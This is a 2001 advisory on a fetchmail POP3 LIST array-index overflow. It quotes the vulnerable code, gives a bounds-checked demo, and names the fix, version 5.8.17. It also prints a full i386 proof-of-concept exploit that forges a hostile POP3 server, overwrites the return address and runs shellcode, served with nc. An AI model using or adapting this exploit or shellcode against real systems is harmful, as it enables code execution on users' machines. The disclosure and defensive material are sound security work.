
Fetchmail buffer overflow vulnerability (unchecked array index in pop3_getsizes)


Published: 2001-08-10
Updated: 2001-08-10
Severity:
Impact: code execution with the privileges of the user running fetchmail (ordinary user access)
Error type: design error (array index taken from server input without a bounds check)
Attack vector: client side (a hostile or spoofed POP3 server attacks the fetchmail client)

Affected systems
fetchmail, all versions prior to 5.8.17 (5.8.17 itself is not affected)
Details
An attacker who controls the POP3 server fetchmail connects to, or who can spoof your DNS resolution so that fetchmail connects to a hostile server instead, can execute arbitrary code on your system with the privileges of the fetchmail user. The problem code is shown below:

pop3.c:


static int pop3_getsizes(int sock, int count, int *sizes)
[snip]
        while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0)
        {
            int num, size;


            if (DOTLINE(buf))
                break;
            else if (sscanf(buf, "%d %d", &num, &size) == 2)
                sizes[num - 1] = size;
        }
[snip]


Every line of the LIST response is parsed as two integers, num and size. The first is used as an index into sizes[] (an array with only as many elements as the STAT reply announced), and the second is the 32-bit value stored there; nothing checks that num lies between 1 and the message count. Because num is a signed int, both negative and positive indices are accepted, so a malicious server can write a chosen 32-bit value at almost any offset before or after the sizes array (num = 0 already hits the word just below it). To perform the write, the attacker only has to forge a POP3 session: answer the greeting, USER, PASS and STAT normally, wait for the client's LIST command, and reply with forged "num size" lines, one write per line, terminated by the usual "." line.
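The following program is an added example written for this page, not fetchmail's code nor its actual patch. It re-creates the LIST parsing loop in two forms: a dry run of the unpatched store that reports where sizes[num - 1] = size would land (as a byte offset from the array, without writing), and a hardened version that refuses any index outside 1..count, where count is the number of messages the STAT reply announced. The DOTLINE() definition and the forged response lines are assumptions constructed for the example; the forged lines are in the exact shape the proof of concept below emits.

```c
#include <stdio.h>
#include <string.h>

/* Assumed shape of fetchmail's DOTLINE(): a line that is just "." (optionally
 * followed by CR/LF) ends a multi-line POP3 response. */
#define DOTLINE(s) ((s)[0] == '.' && ((s)[1] == '\r' || (s)[1] == '\n' || (s)[1] == '\0'))

enum list_result {
    LIST_DONE,      /* "." terminator seen */
    LIST_STORED,    /* "num size" with 1 <= num <= count: sizes[num-1] written */
    LIST_REJECTED,  /* index outside sizes[]: hostile or broken server */
    LIST_SKIPPED    /* line is not two integers; ignored, as the original does */
};

/* Dry run of the unpatched store sizes[num - 1] = size: returns the byte
 * offset from &sizes[0] that the write would land on, without writing.
 * Sets *parsed to 0 (and returns 0) when the line is not "num size". */
long unpatched_write_offset(const char *line, int *parsed)
{
    int num, size;
    if (sscanf(line, "%d %d", &num, &size) != 2) {
        *parsed = 0;
        return 0;
    }
    (void)size;
    *parsed = 1;
    return ((long)num - 1) * (long)sizeof(int);
}

/* Hardened loop body: sizes[] has exactly count elements (the STAT count),
 * so only 1 <= num <= count may be stored. Everything else is refused. */
enum list_result pop3_store_size(const char *line, int count, int *sizes)
{
    int num, size;
    if (DOTLINE(line))
        return LIST_DONE;
    if (sscanf(line, "%d %d", &num, &size) != 2)
        return LIST_SKIPPED;
    if (num < 1 || num > count)
        return LIST_REJECTED;   /* the unpatched code would write here */
    sizes[num - 1] = size;
    return LIST_STORED;
}

/* Run a whole LIST response through the hardened body; stops at ".".
 * Returns the number of lines refused, which a real client should treat
 * as a protocol error rather than silently continue. */
int pop3_getsizes_hardened(const char *const *lines, int nlines, int count, int *sizes)
{
    int rejected = 0;
    for (int i = 0; i < nlines; i++) {
        enum list_result r = pop3_store_size(lines[i], count, sizes);
        if (r == LIST_DONE)
            break;
        if (r == LIST_REJECTED)
            rejected++;
    }
    return rejected;
}

/* Constructed LIST response in the shape the proof of concept emits
 * (STAT announced 10 messages, so sizes[] has 10 elements). */
#define FORGED_COUNT 10
#define FORGED_LINES 6
static const char *const forged_list[FORGED_LINES] = {
    "-10 -1073759596",  /* what printf("%d %d", -10, 0xbfffba94) emits */
    "0 -1869574000",    /* index 0 hits sizes[-1], the word below the array */
    "11 -1869574000",   /* one element past the 10 that STAT announced */
    "1 1234",           /* legitimate entry */
    "10 99",            /* legitimate entry, last valid index */
    ".",
};

int main(void)
{
    int sizes[FORGED_COUNT] = {0};
    for (int i = 0; i < FORGED_LINES; i++) {
        int parsed;
        long off = unpatched_write_offset(forged_list[i], &parsed);
        enum list_result r = pop3_store_size(forged_list[i], FORGED_COUNT, sizes);
        printf("%-18s unpatched write at sizes%+ld bytes, hardened: %s\n",
               forged_list[i], parsed ? off : 0L,
               r == LIST_STORED ? "stored" : r == LIST_REJECTED ? "REJECTED"
               : r == LIST_DONE ? "end of list" : "skipped");
        if (r == LIST_DONE)
            break;
    }
    return 0;
}
```

The three forged lines are refused and the two legitimate ones are stored; the dry run shows that the first forged line alone would have written 44 bytes below the array, which is how the proof of concept reaches a saved return address. Note that the check has to use the count from STAT, not the size of the buffer the line was read into: the overflow is in the index, not in the line length.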

Proof of concept
/* fetchmail proof of concept i386 exploit
 * Copyright (C) 2001 Salvatore Sanfilippo <antirez@invece.org>
 * Code under the GPL license.
 *
 * Usage: ./a.out | nc -l -p 3333
 * fetchmail localhost -P 3333 -p POP3
 *
 * This is a bad exploit with offsets carefully selected
 * to work on my own system. It will probably not work on
 * your system if you don't modify RETR_OFFSET and SHELL_PTR,
 * but you may try to set SHELL_PTR to 0xAAAAAAAA
 * and use gdb to obtain proof that your fetchmail is vulnerable
 * without exploiting it.
 * Or just read the code in pop3.c.
 *
 * To improve the exploit's portability you may put the shellcode inside
 * one of the static char buffers, grep 'static char' *.c.
 *
 * Tested on fetchmail 5.8.15 running on Linux 2.4.6
 *
 * On success you should see the ls output.
 */

#include <stdio.h>

#define MESSAGES 10          /* message count announced in the forged STAT reply */
#define RETR_OFFSET -10      /* LIST index around which the saved return address lies */
#define SHELL_PTR 0xbfffba94 /* stack address the NOP sled below lands at on the author's system */

int main(void)
{
    int ish = SHELL_PTR;
    /* use the #define so that editing RETR_OFFSET really changes the offsets,
     * as the header comment says (the value is the one the author tested with) */
    int ret_offset = RETR_OFFSET;
    char shellcode[] = /* keep the shellcode a multiple of 4 bytes: it is sent as 32-bit words */
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/ls\0\0";
    int *sc = (int*) shellcode;
    int noop = 0x90909090;
    int i;

    /* +OK for the greeting, USER and PASS, then the STAT reply announcing
     * MESSAGES messages, then +OK for the next two commands, the last of
     * which is the LIST whose response the lines below forge */
    printf("+OK\r\n+OK\r\n+OK\r\n+OK %d 0\r\n+OK 0\r\n+OK\r\n", MESSAGES);
    /* Overwrite the saved return address: each line "i v" makes the client
     * store v at sizes[i-1], and negative i writes below the array, where
     * the return address sits on the author's stack; spray 40 words around
     * the expected offset */
    for (i = ret_offset-20; i < ret_offset+20; i++)
        printf("%d %d\r\n", i, ish);
    /* NOP sled inside the sizes array itself (indices 1..20) */
    for (i = 1; i < 21; i++)
        printf("%d %d\r\n", i, noop);
    /* Shellcode, one 32-bit word per LIST line, right after the sled */
    for (i = 21; i < 21 + (int)(sizeof(shellcode)/4); i++)
        printf("%d %d\r\n", i, *sc++);
    printf(".\r\n"); /* terminate the multi-line POP3 response */
    return 0;
}

Solution
Upgrade to fetchmail 5.8.17, which range-checks the index before storing into the sizes array.
